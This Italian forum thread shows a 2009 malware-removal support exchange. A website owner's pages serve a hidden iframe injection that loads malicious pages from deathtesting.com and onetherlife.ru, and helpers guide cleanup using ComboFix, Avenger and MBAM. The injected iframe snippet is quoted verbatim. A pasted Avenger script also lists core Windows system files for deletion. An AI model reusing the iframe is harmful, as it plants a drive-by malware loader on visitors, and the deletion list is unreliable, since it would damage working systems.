Olimpo Informatico

[bluegard14]

Da qualche tempo se entro nel sito mi appare una richiesta di installazione di un componente aggiuntivo,



anche se non accetto l'installazione, il mio antivirus si mette a cantare e iniziano ad aprirsi finestre, cambia lo sfondo del desktop con una immagine con scritto VIRUS ALERT, e il pc si riavvia incessantemente....
Io lancio combofix e ccleaner e tutto torna normale a posto..
Faccio di nuovo l'upload della index del sito e tutto torna ok..
Dopo pochi minuti al nuovo accesso nel sito la richiesta di installazione del componente aggiuntivo riappare, l'antivirus ricomincia a suonare ed ecco che tutto riparte, finestre riavvii ecc..

L'assistenza del mio hosting ha controllato i server e dice di non aver nessun virus.. mi ha comunicato che con firebug hanno visto che viene caricata una pagina http://deathtesting. com:8080/index.php
io ho controllato in rete e una stringa di codice simile a questa potrebbe essere

<div style="display:none"> <iframe width=438 height=168 src="http://deathtesting. com:8080/index.php"> </ iframe> </ div>

ma su tutte le mie pagine non esiste nulla di simile...
CHIEDO AIUTO URGENTE!


Intanto vi allego anche il log di combofix per farvi vedere quali virus trova dopo la richiesta di installazione del componente aggiuntivo all'accesso ai siti


ComboFix 09-09-25.01 - Fabri 28/09/2009 1.45.28.17.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.3.1252.39.1040.18.3327.2629 [GMT 2:00]
Eseguito da: d:\programmi\olimpo informatico\CFX.exe
AV: AntiVir Desktop *On-access scanning disabled* (Updated) {00000002-0002-0000-7C25-9E7C08000A00}
AV: AntiVir Desktop *On-access scanning enabled* (Updated) {00000002-0002-0000-6C25-9E7C08000A00}
.

((((((((((((((((((((((((((((((((((((( Altre eliminazioni )))))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\documents and settings\All Users\Dati applicazioni\16370464
c:\documents and settings\All Users\Dati applicazioni\16370464\16370464
c:\documents and settings\All Users\Dati applicazioni\16370464\16370464.exe
c:\documents and settings\All Users\Dati applicazioni\16370464\pc16370464ins
c:\documents and settings\All Users\Dati applicazioni\epeloqil.dl
c:\documents and settings\All Users\Dati applicazioni\mesale.dl
c:\documents and settings\All Users\Dati applicazioni\ydypygyp.pif
c:\documents and settings\Fabri\Cookies\reroxehyb.vbs
c:\documents and settings\Fabri\Dati applicazioni\dylezed.sys
c:\documents and settings\Fabri\Dati applicazioni\Microsoft\Internet Explorer\Quick Launch\AntivirusPro_2010.lnk
c:\documents and settings\Fabri\Dati applicazioni\qypajibuqu.exe
c:\documents and settings\Fabri\Dati applicazioni\wiaserva.log
c:\documents and settings\Fabri\Dati applicazioni\yquhup.reg
c:\documents and settings\Fabri\Desktop\AntivirusPro_2010.lnk
c:\documents and settings\Fabri\Impostazioni locali\Temporary Internet Files\cerok.dll
c:\documents and settings\Fabri\Impostazioni locali\Temporary Internet Files\giti.dll
c:\documents and settings\Fabri\Menu Avvio\Programmi\AntivirusPro_2010
c:\documents and settings\Fabri\Menu Avvio\Programmi\AntivirusPro_2010\AntivirusPro_2010.lnk
c:\documents and settings\Fabri\Menu Avvio\Programmi\AntivirusPro_2010\Uninstall.lnk
c:\documents and settings\Fabri\Menu Avvio\Programmi\Esecuzione automatica\ikowin32.exe
c:\programmi\AntivirusPro_2010
c:\programmi\AntivirusPro_2010\AntivirusPro_2010.cfg
c:\programmi\AntivirusPro_2010\AntivirusPro_2010.exe
c:\programmi\File comuni\dafumo.reg
c:\programmi\File comuni\odyde.bin
c:\windows\mijusu.scr
c:\windows\system32\_scui.cpl
c:\windows\system32\alipe.ban
c:\windows\system32\uwak._dl

.
((((((((((((((((((((((((( Files Creati Da 2009-08-27 al 2009-09-27 )))))))))))))))))))))))))))))))))))
.

2009-09-27 23:43 . 2009-09-27 23:43 19971 ----a-w- c:\windows\aqaqedawod.dat
2009-09-27 23:43 . 2009-09-27 23:43 17939 ----a-w- c:\programmi\File comuni\yrota.dat
2009-09-27 23:43 . 2009-09-27 23:43 17921 ----a-w- c:\documents and settings\Fabri\Impostazioni locali\Dati applicazioni\ojehob.dat
2009-09-27 23:43 . 2009-09-27 23:43 16191 ----a-w- c:\windows\system32\ypit.com
2009-09-27 18:04 . 2009-09-27 18:09 -------- d-----w- C:\CFX23205C
2009-09-27 18:03 . 2009-09-27 23:42 43520 ----a-w- c:\windows\system32\restorer32_a.exe
2009-09-27 18:03 . 2009-09-27 23:42 43520 ----a-w- c:\documents and settings\Fabri\restorer32_a.exe
2009-09-26 09:51 . 2009-09-26 09:58 -------- d-----w- C:\CFX21439C
2009-09-26 09:07 . 2009-09-26 09:11 -------- d-----w- C:\CFX27006C
2009-09-24 15:14 . 2009-09-24 15:18 -------- d-----w- C:\CFX25800C
2009-09-23 16:29 . 2009-09-23 16:33 -------- d-----w- C:\CFX29913C
2009-09-23 16:20 . 2009-09-23 16:20 -------- d-----r- c:\documents and settings\LocalService\Preferiti
2009-09-23 07:57 . 2009-06-21 21:47 153088 -c----w- c:\windows\system32\dllcache\triedit.dll

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-27 23:43 . 2009-09-27 18:04 230000 ----a-w- c:\documents and settings\Fabri\Dati applicazioni\lizkavd.exe
2009-09-27 23:42 . 2009-09-27 18:03 264704 ----a-w- c:\documents and settings\Fabri\Dati applicazioni\svcst.exe
2009-09-27 23:42 . 2009-09-27 18:03 264704 ----a-w- c:\documents and settings\Fabri\Dati applicazioni\seres.exe
2009-09-27 15:09 . 2008-10-08 09:44 -------- d-----w- c:\documents and settings\Fabri\Dati applicazioni\TeraCopy
2009-09-26 12:07 . 2008-12-22 16:08 -------- d-----w- c:\programmi\IcoFX 1.6
2009-09-23 07:57 . 2009-05-01 09:49 55656 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2009-08-17 13:23 . 2008-09-23 09:29 -------- d--h--w- c:\programmi\InstallShield Installation Information
2009-08-17 13:10 . 2008-10-08 17:42 -------- d-----w- c:\programmi\Pinnacle
2009-08-15 23:00 . 2009-08-15 23:00 664 ----a-w- c:\windows\system32\d3d9caps.dat
2009-08-15 16:30 . 2009-08-15 16:30 -------- d-----w- c:\programmi\WinHTTrack
2009-08-14 13:32 . 2009-08-14 13:32 -------- d-----w- c:\programmi\FreeSoft
2009-08-14 10:34 . 2009-08-14 10:33 -------- d-----w- c:\documents and settings\Fabri\Dati applicazioni\Wormux
2009-08-11 22:59 . 2009-08-11 22:59 -------- d-----w- c:\programmi\Veoh Networks
2009-08-09 13:27 . 2009-08-09 13:27 -------- d-----w- c:\programmi\Microsoft
2009-08-09 13:27 . 2008-09-23 10:37 -------- d-----w- c:\programmi\Windows Live
2009-08-06 10:54 . 2009-08-06 10:54 -------- d-----w- c:\programmi\Teleport Pro
2009-08-05 16:34 . 2008-09-23 10:41 -------- d-----w- c:\programmi\Java
2009-08-05 16:34 . 2006-03-02 12:00 79514 ----a-w- c:\windows\system32\perfc010.dat
2009-08-05 16:34 . 2006-03-02 12:00 479180 ----a-w- c:\windows\system32\perfh010.dat
2009-08-05 10:18 . 2009-08-05 10:18 -------- d-----w- c:\programmi\Smallvideosoft
2009-08-05 10:16 . 2009-08-05 10:16 -------- d-----w- c:\programmi\File comuni\xing shared
2009-08-05 10:16 . 2009-08-05 10:16 -------- d-----w- c:\programmi\File comuni\Real
2009-08-05 10:16 . 2008-09-23 11:06 348160 ----a-w- c:\windows\system32\msvcr71.dll
2009-08-05 08:59 . 2006-03-02 12:00 205312 ----a-w- c:\windows\system32\mswebdvd.dll
2009-08-03 19:48 . 2008-09-23 11:16 19600 ----a-w- c:\documents and settings\Fabri\Impostazioni locali\Dati applicazioni\GDIPFONTCACHEV1.DAT
2009-08-03 19:46 . 2008-12-10 14:28 -------- d-----w- c:\documents and settings\All Users\Dati applicazioni\Motive
2009-08-03 19:39 . 2009-08-03 19:39 -------- d-----w- c:\programmi\MSBuild
2009-08-03 19:39 . 2009-08-03 19:39 -------- d-----w- c:\programmi\Reference Assemblies
2009-08-03 19:32 . 2008-09-23 10:37 -------- d-----w- c:\documents and settings\All Users\Dati applicazioni\WLInstaller
2009-08-03 19:21 . 2009-08-03 19:21 -------- d-----w- c:\programmi\Windows Live SkyDrive
2009-08-03 19:19 . 2008-09-23 10:28 -------- d-----w- c:\documents and settings\All Users\Dati applicazioni\Google Updater
2009-08-03 19:19 . 2008-09-23 10:28 -------- d-----w- c:\programmi\Google
2009-08-03 19:18 . 2009-08-03 19:18 -------- d-----w- c:\programmi\File comuni\Windows Live
2009-08-03 19:13 . 2009-08-03 19:12 -------- d-----w- c:\programmi\Microsoft LifeCam
2009-08-03 13:07 . 2009-08-03 13:07 403816 ----a-w- c:\windows\system32\OGACheckControl.dll
2009-08-03 13:07 . 2009-08-03 13:07 322928 ----a-w- c:\windows\system32\OGAAddin.dll
2009-08-03 13:07 . 2009-08-03 13:07 230768 ----a-w- c:\windows\system32\OGAEXEC.exe
2009-07-25 03:23 . 2008-12-19 14:29 411368 ----a-w- c:\windows\system32\deploytk.dll
2009-07-17 19:01 . 2006-03-02 12:00 58880 ----a-w- c:\windows\system32\atl.dll
2009-07-13 21:43 . 2006-03-02 12:00 286208 ----a-w- c:\windows\system32\wmpdxm.dll
2009-07-03 16:55 . 2006-03-02 12:00 915456 ------w- c:\windows\system32\wininet.dll
.

((((((((((((((((((((((((((((( SnapShot_2009-09-23_16.32.36 )))))))))))))))))))))))))))))))))))))))))
.
+ 2009-09-27 14:39 . 2009-09-27 14:39 16384 c:\windows\Temp\Perflib_Perfdata_c48.dat
+ 2009-09-27 14:39 . 2009-09-27 14:39 16384 c:\windows\Temp\Perflib_Perfdata_170.dat
.
((((((((((((((((((((((((((((((((((((( Punti Reg Caricati ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Nota* i valori vuoti & legittimi/default non sono visualizzati.
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\programmi\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2008-09-23 39408]
"PcSync"="c:\programmi\Nokia\Nokia PC Suite 6\PcSync2.exe" [2005-11-30 1306624]
"MSMSGS"="c:\programmi\Messenger\msmsgs.exe" [2008-04-13 1695232]
"VeohPlugin"="c:\programmi\Veoh Networks\VeohWebPlayer\veohwebplayer.exe" [2009-08-07 1995512]
"restorer32_a"="c:\documents and settings\Fabri\restorer32_a.exe" [2009-09-27 43520]
"mserv"="c:\documents and settings\Fabri\Dati applicazioni\seres.exe" [2009-09-27 264704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UpdReg"="c:\windows\Updreg.exe" [2000-05-10 90112]
"WinampAgent"="c:\programmi\Winamp3\winampa.exe" [2002-07-23 12288]
"Norton Ghost 14.0"="c:\programmi\Norton Ghost\Agent\VProTray.exe" [2008-01-19 2245984]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2008-09-17 13574144]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2008-09-17 86016]
"CTStartup"="c:\programmi\Creative\SBAudigy\Program\CTEaxSpl.EXE" [2001-06-03 28672]
"Jet Detection"="c:\programmi\Creative\SBAudigy\PROGRAM\ADGJDet.exe" [2001-04-20 28672]
"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]
"Adobe Reader Speed Launcher"="c:\programmi\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-01-11 39792]
"Motive SmartBridge"="c:\progra~1\ALICET~1\SMARTB~1\MotiveSB.exe" [2006-04-21 438359]
"RemoteControl"="c:\programmi\ASUS\ASUS Remote\RemoteControlAppl.exe" [2007-02-12 65536]
"LanguageShortcut"="c:\programmi\CyberLink\PowerDVD\Language\Language.exe" [2006-12-05 54832]
"PCMService"="c:\programmi\CyberLink\PowerCinema\PCMService.exe" [2007-02-09 159744]
"avgnt"="c:\programmi\Avira\AntiVir Desktop\avgnt.exe" [2009-03-02 209153]
"VX1000"="c:\windows\vVX1000.exe" [2007-04-10 709992]
"LifeCam"="c:\programmi\Microsoft LifeCam\LifeExp.exe" [2007-05-17 279912]
"AdobeCS4ServiceManager"="c:\programmi\File comuni\Adobe\CS4ServiceManager\CS4ServiceManager.exe" [2008-08-14 611712]
"TkBellExe"="c:\programmi\File comuni\Real\Update_OB\realsched.exe" [2009-08-05 198160]
"SunJavaUpdateSched"="c:\programmi\Java\jre6\bin\jusched.exe" [2009-07-25 149280]
"restorer32_a"="c:\windows\system32\restorer32_a.exe" [2009-09-27 43520]
"nwiz"="nwiz.exe" - c:\windows\system32\nwiz.exe [2008-09-17 1657376]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.EXE [2006-08-01 16049664]
"SkyTel"="SkyTel.EXE" - c:\windows\SkyTel.exe [2006-05-16 2879488]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-13 15360]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"ForceClassicControlPanel"= 1 (0x1)

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"UpdatesDisableNotify"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"d:\\Programmi\\Emule\\emule.exe"=
"d:\\UT2004\\System\\UT2004.exe"=
"c:\\Programmi\\Ahead\\Nero\\nero.exe"=
"c:\\Programmi\\Adobe\\Reader 8.0\\Reader\\AcroRd32.exe"=
"c:\\Programmi\\Creative\\SBAudigy\\AudioHQ\\AudioHQU.exe"=
"c:\\Programmi\\Creative\\SBAudigy\\Program\\RDefault.exe"=
"c:\\WINDOWS\\amcap.exe"=
"c:\\Programmi\\Creative\\SBAudigy\\SurMix2\\SurMix2.exe"=
"c:\\Programmi\\DVDFab 5\\DVDFab.exe"=
"c:\\Programmi\\Macromedia\\Flash 5\\Flash.exe"=
"c:\\Programmi\\Macromedia\\Flash 5\\Lettori\\FlashPla.exe"=
"d:\\Programmi\\Emule\\LinkCreator.exe"=
"d:\\Programmi\\Dreamweaver installato\\Dreamweaver MX\\Dreamweaver.exe"=
"c:\\Programmi\\Ahead\\Nero BackItUp\\BackItUp.exe"=
"c:\\Programmi\\Ahead\\Nero Toolkit\\CDSpeed.exe"=
"c:\\Programmi\\Ahead\\CoverDesigner\\CoverDes.exe"=
"c:\\Programmi\\Ahead\\Nero Toolkit\\DriveSpeed.exe"=
"c:\\Programmi\\Ahead\\ImageDrive\\ImageDrive.exe"=
"c:\\Programmi\\Ahead\\Nero Toolkit\\InfoTool.exe"=
"c:\\Programmi\\Ahead\\Nero SoundTrax\\SoundTrax.exe"=
"c:\\Programmi\\Ahead\\Nero StartSmart\\NeroStartSmart.exe"=
"c:\\Programmi\\Ahead\\Nero Wave Editor\\WaveEdit.exe"=
"c:\\Programmi\\Nokia\\Nokia PC Suite 6\\LaunchApplication.exe"=
"c:\\Programmi\\Norton Ghost\\Console\\VProConsole_.exe"=
"c:\\Programmi\\Outlook Express\\msimn.exe"=
"c:\\Programmi\\Norton Ghost\\Browser\\V2iBrowser.exe"=
"c:\\Programmi\\Norton Ghost\\Agent\\SecurityConfig.exe"=
"c:\\Programmi\\TeraCopy\\TeraCopy.exe"=
"c:\\Programmi\\Ulead Systems\\Ulead GIF Animator 5\\ga_main.exe"=
"c:\\Programmi\\DVDFab 5\\unins000.exe"=
"c:\\Programmi\\TeraCopy\\unins000.exe"=
"c:\\Programmi\\Winamp3\\uninst-wa3.exe"=
"d:\\UT2004\\System\\UnrealEd.exe"=
"c:\\WINDOWS\\vidcap32.exe"=
"c:\\Programmi\\Winamp3\\Studio.exe"=
"c:\\Programmi\\Windows Live\\Mail\\wlmail.exe"=
"c:\\Programmi\\Messenger\\msmsgs.exe"=
"c:\\Programmi\\Movie Maker\\moviemk.exe"=
"c:\\Programmi\\WinRAR\\WinRAR.exe"=
"c:\\Programmi\\WinZip\\WINZIP32.EXE"=
"c:\\Programmi\\Microsoft LifeCam\\LifeCam.exe"=
"c:\\Programmi\\Microsoft LifeCam\\LifeExp.exe"=
"c:\\Programmi\\File comuni\\Adobe\\CS4ServiceManager\\CS4ServiceManager.exe"=
"d:\\Giochi\\[PC GAME] Worms Armageddon\\wormsarm\\WA.exe"=
"c:\\Programmi\\Windows Live\\Messenger\\wlcsdk.exe"=
"c:\\Programmi\\Windows Live\\Messenger\\msnmsgr.exe"=
"c:\\Programmi\\Veoh Networks\\VeohWebPlayer\\veohwebplayer.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"5353:TCP"= 5353:TCP:Adobe CSI CS4

R2 Symantec SymSnap VSS Provider;Symantec SymSnap VSS Provider;c:\windows\system32\dllhost.exe [02/03/2006 14.00.00 5120]
R3 3xHybrid;ASUSTek SAA713x PCI Card;c:\windows\system32\drivers\3xHybrid.sys [23/12/2008 15.55.40 2831232]
R3 SymSnapService;SymSnapService;c:\programmi\Norton Ghost\Shared\Drivers\SymSnapService.exe [20/12/2007 17.13.46 1553896]
S2 Network WanMiniport First Position;Network WanMiniport First Position;c:\programmi\Telecom Italia\WanMiniport1st\srvany.exe [10/12/2008 16.28.45 8192]
S3 ADM851X;IDF Alice Gate 2 plus USB;c:\windows\system32\drivers\ADM851X.sys [27/10/2004 17.05.10 22144]
S3 emu10kx;Creative EMU10K1/EMU10K2 Audio Driver (WDM);c:\windows\system32\drivers\e10kx2k.sys [13/07/2001 14.29.12 1745168]
S3 pctvvbi;PCTVVBI;c:\windows\system32\drivers\pctvvbi.sys [23/09/2008 14.56.56 6369]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}]
"c:\windows\system32\rundll32.exe" "c:\windows\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
.
Contenuto della cartella 'Scheduled Tasks'

2009-09-27 c:\windows\Tasks\Google Software Updater.job
- c:\programmi\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-09-23 19:19]

2009-08-03 c:\windows\Tasks\Microsoft_Hardware_Launch_vVX1000_exe.job
- c:\windows\vVX1000.exe [2009-08-03 21:46]

2009-09-27 c:\windows\Tasks\OGALogon.job
- c:\windows\system32\OGAEXEC.exe [2009-08-03 13:07]
.
.
------- Scansione supplementare -------
.
uStart Page = hxxp://www.google.it/
uInternet Settings,ProxyOverride = 127.0.0.1
IE: E&sporta in Microsoft Excel - c:\progra~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
DPF: Microsoft XML Parser for Java - file:///C:/WINDOWS/Java/classes/xmldso.cab
DPF: {5AF01DCD-8539-4814-9693-ADF47058F075} - hxxp://aiuto.alice.it/ata/static/installers/WebflowActiveXInstaller_4-1-5.cab
.
- - - - CHIAVI ORFANE RIMOSSE - - - -

HKLM-Run-16370464 - c:\documents and settings\All Users\Dati applicazioni\16370464\16370464.exe



**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-28 01:47
Windows 5.1.2600 Service Pack 3 NTFS

scansione processi nascosti ...

scansione entrate autostart nascoste ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
CTStartup = c:\programmi\Creative\SBAudigy\Program\CTEaxSpl.EXE /run?93?????????????x??????s$????\?w? ?w???????w???w4???????.??w4???????4???TA?s4????????93?????\???0???0???\???\???~???$???5?:~e?:~\???\???~?????a???????:~\???\??????s????\??????s\????93?A??s?93???:~???

Scansione files nascosti ...

Scansione completata con successo
Files nascosti: 0

**************************************************************************
.
--------------------- CHIAVI DI REGISTRO BLOCCATE ---------------------

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\h??|ÿÿÿÿ¤??|ù?9~*]
"0140110900063D11C8EF10054038389C"="C?\\WINDOWS\\system32\\FM20ENU.DLL"
.
Ora fine scansione: 2009-09-27 1.48.12
ComboFix-quarantined-files.txt 2009-09-27 23:48
ComboFix2.txt 2009-09-27 18:09
ComboFix3.txt 2009-09-26 09:58
ComboFix4.txt 2009-09-26 09:11
ComboFix5.txt 2009-09-27 23:45

Pre-Run: 11.648.520.192 byte disponibili
Post-Run: 11.637.563.392 byte disponibili

252 --- E O F --- 2009-08-17 13:25

[Sante62]

Ciao bluegard14

Anche tu hai il PC parecchio incasinato.

I logs non vanno incollati quì ma caricati su Wikisend

Apri il notepad e copia/incolla queste scritte:

[bluegard14]

ciao e grazie per il tuo tempo...

allora io ho fatto tutto quello che hai detto:

ho creato il file con blocconote e ci ho incollato:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"restorer32_a"=-
"mserv"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UpdReg"=-
"restorer32_a"=-

poi l'ho rinominato fix.reg e l'ho salvato in C:\

ho scaricato The Avenger e l'ho scompattato il C:\
l'ho avviato e ho clicato su OK
All'interno del box bianco ho incollato:

Registry values to replace with dummy:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs

files to delete:
c:\windows\aqaqedawod.dat
c:\programmi\File comuni\yrota.dat
c:\documents and settings\Fabri\Impostazioni locali\Dati applicazioni\ojehob.dat
c:\windows\system32\ypit.com
C:\CFX23205C
c:\windows\system32\restorer32_a.exe
c:\documents and settings\Fabri\restorer32_a.exe
C:\CFX21439C
C:\CFX27006C
C:\CFX25800C
C:\CFX29913C
c:\windows\Tasks\Google Software Updater.job
c:\programmi\Google\Common\Google Updater\GoogleUpdaterService.exe
c:\windows\Tasks\Microsoft_Hardware_Launch_vVX1000_exe.job
c:\windows\system32\OGAEXEC.exe
c:\windows\system32\OGACheckControl.dll
c:\windows\system32\OGAAddin.dll
c:\windows\system32\OGAEXEC.exe
c:\windows\system32\deploytk.dll
c:\windows\system32\atl.dll
c:\windows\system32\wmpdxm.dll
c:\windows\system32\wininet.dll

programs to launch on reboot:
C:\fix.reg

ho cliccato su execute e ho riavviato
Al riavvio però mi ha dato l'errore di file non trovato in questo caso fix.reg (eppure ce l'avevo messo)
poi un secondo errore come riporto nell'immagine:


Ho ripetuto i passaggi 2 volte ma ho avuto sempre lo stesso risultato di errori!

siccome credo di aver fatto casino lancio il backup del SO e ritornerò a vedere una tua risposta a breve...
Grazie cmq 8)

[bluegard14]

dimenticavo.. in tutti e due i tentativi, al riavvio il file fix.reg precedentemente creato su C:\ non veniva trovato!

[Sante62]

Guarda su C:\ se per caso è stato creato un log di Avenger, denominato Avenger.txt. Se non c'è, prova a mettere Avenger sul desktop e rifai la procedura. Se non ricordo male, sotto al box bianco di avenger c'è la voce scan for rootkit, che dovresti deselezionare, se non lo è già.

Quel messaggio di errore che hai postato, appartiene a Googletoolbar e non c'entra nulla con quello che dobbiamo fare noi. Quindi toglilo di mezzo, e disattiva anche antivirus etc. Se non abbiamo esito positivo, proveremo qualchje altra procedura.

[bluegard14]

ciao..
allora ho ripetuto la procedura come hai detto, con avenger sul desktop..
al riavvio non ci sono errori ma il log di avenger non lo vedo ne sul desktop ne su c:\
Sul desktop ho un file di nome regrunlog.txt
e su c:\ quello che prima era fix.reg ora è diventato backup.reg

come devo procedere?

[Sante62]

Prova a caricare il backup.reg.

[bluegard14]

eccolo qui...
backup.reg

[Sante62]

Fai la scansione con Systemscan e posta il log generato come
indicato quì

[bluegard14]

02_10_2009_10_15_report.zip
per log generato intendi il file.zip oppure il report.txt?

[Sante62]

Fa lo stesso....

Salva il file fix.reg in C:\ con questo:

[bluegard14]

//////////////////////////////////////////
Avenger Pre-Processor log
//////////////////////////////////////////

Error: could not create zip file.
Error code: 80

questo è il contenuto del file avenger.txt

Ma al riavvio ha iniziato a suonare l'antivirus come un pazzo, mi ha

installato un programma di nome Security tool ed è partita una

scansione del sistema che io ho fermato.. ho rilanciato combofix ma non

ha trovato nulla....
ComboFix.txt

io davvero non so più che fare......

[Sante62]

Allora devi procedere manualmente alla rimozione delle chiavi di registro e file. Evidentemente non riesce a causa del malware.

Vai su start->esegui e digita regedit;
si aprirà il registro di sistema;

Naviga attraverso queste chiavi:

[bluegard14]

Allora guarda ho dovuto di nuovo rilanciare l'immagine di backup di norton ghost perchè il virus non mi faceva fare più nulla, mi apriva falsi scanner antivirus con continuai allarmi di avira antivir e non potevo più procedere, ho provato a rifare combofix ma neppure lui dopo il riavvio automatico è riuscito a far nulla..
Credo che convenga, adesso che ho l'immagine più (pulita), riprovare un procedimento tutto da capo..
Te ne sarei grato, altrimenti mi sa che non ne usciamo....


Ma volevo anche farti presente come nasce il problema.. come già descritto all'apertura di questo 3d, ho dei siti commerciali tutti collegati tra di loro con link testuali in ciascuna homepage.. Ho un virus autoinstallante che appare in maniera altalenante tra i vari siti, allora ho provato a riscrivere tutte le index da capo (non con copia e incolla) e ho eliminato tutte le vecchie index. Ieri ci ho messo 14 ore a rifare tutto da capo..
poi attraverso ftp ho prima cancellato le vecchie index (probabilmente con codice html infettato) e poi ho riuploadato le nuove index ognuna per ciascun sito..

Ieri sera sembrava andare tutto bene dopo questo procedimento ma stamattina ho provato ad entrare in uno qualsiasi dei miei siti e TAC! Rieccoti il famoso componente aggiuntivo che ho raffigurato con l'immagine all'apertura del 3d con conseguente installazione di molteplici programmini che partono in automatico come falsi antivirus che lanciano scansioni del sistema ecc...

Adesso ho fatto un altro tentativo:

Ho provato ad eliminare tutta la lista dei link testuali che collegavano i siti tra di loro e pare che la richiesta del componente aggiuntivo non compaia (almeno per ora) ho appena fatto un giro su tutti i siti e non è successo nulla!!
Ma allora mi chiedo possibile che il virus abbia vita solo se i siti sono collegati tra di loro? Se ce ne fosse anche uno solo con il codice html infettato avrei dovuto trovarlo adesso che li ho rivisitati tutti e invece nulla... sono convinto che se rimetto le liste dei link testuali il virus riappare..

Tu capisci che un sito senza link esterni ad altri siti a tema non viene preso in considerazione dai motori di ricerca, quindi.... che fare? Dove possiamo andare a vedere di risolvere il problema?

Confido in te.. perchè io oltre a non dormirci la notte e a fumare 2 pacchetti di sigarette al giorno, poi le ho provate tutte quelle di mia competenza!

[bluegard14]

anche togliendo i link il virus rimane..

Allora ho trovato una cosa molto interessante e strana allo stesso tempo


<body bgcolor="#000000" background="eleganti0060.jpg" text="#000000" link="#FF0000" vlink="#FF0000" alink="#FF0000"><div style="display:none">zziznrdodxjqmkoteruubwwggbtnzte<iframe width=872 height=315 src="http://onetherlife.ru:8080/index.php" ></iframe></div>

aprendo il mio sito con il programma di grafica con il quale ho realizzato il sito, questo codice non esiste, mentre invece risulta esserci chiedendo la visualizzazione del codice html con il browser di IE.
Poi se rifaccio l'upload della pagina e vado a vedere l'html del sito con il browser il pezzo di codice non c'è..
se aggiorno la pagina e ricontrollo l'html il codice riappare...
come si fa per eliminare questo virus?
come è possibile che venga aggiunto ="display:none">zziznrdodxjqmkoteruubwwggbtnzte<iframe width=872 height=315 src="http://onetherlife.ru:8080/index.php
via web? come si può fare per cancellare questo problema?
HELP!

[Sante62]

Ho visto potrebbe trattarsi del Trojan Fake Alert, sicuramente il tuo antivirus, lo ha segnalato, con il relativo nome. Tool specifici non ne ho trovati o quanto meno non mi fido.

Evidentemente il metodo che abbiamo utilizzato non funziona, quindi segui le istruzioni di questo topic per usare MBAM, e dovrebbe riuscire ad eliminarlo.

[bluegard14]

sto facendo la scansione completa con MBAM, questo è un portatile.. alla fine della scansione di C:\ ha trovato 14 infezioni.. ha iniziato D:\ da 10 minuti e ne ha già trovate altre 2!! e io che credevo che con combofix ogni volta mi lustrasse a nuovo il SO
Non appena finisce ti posto i risultati...
grazie 1000 per ora..

[bluegard14]

ecco qui:
log-MBAM.txt

[Sante62]

disattiva il ripristino di sistema e lascialo disattivato finchè non terminiamo.

Lancia adesso nuovamente Combofix, perchè ancora quello che volevo vedere dai risultati ancora non c'è. Speriamo di vederlo con questo. Invia anche un log aggiornato di Hijackthis.

[bluegard14]

allora ecco qui:
hijackthis.log

ComboFix.txt

una domanda.. quando lancio hijackthis mi trova molte voci selezionabili.. devo eliminarle? fixarle?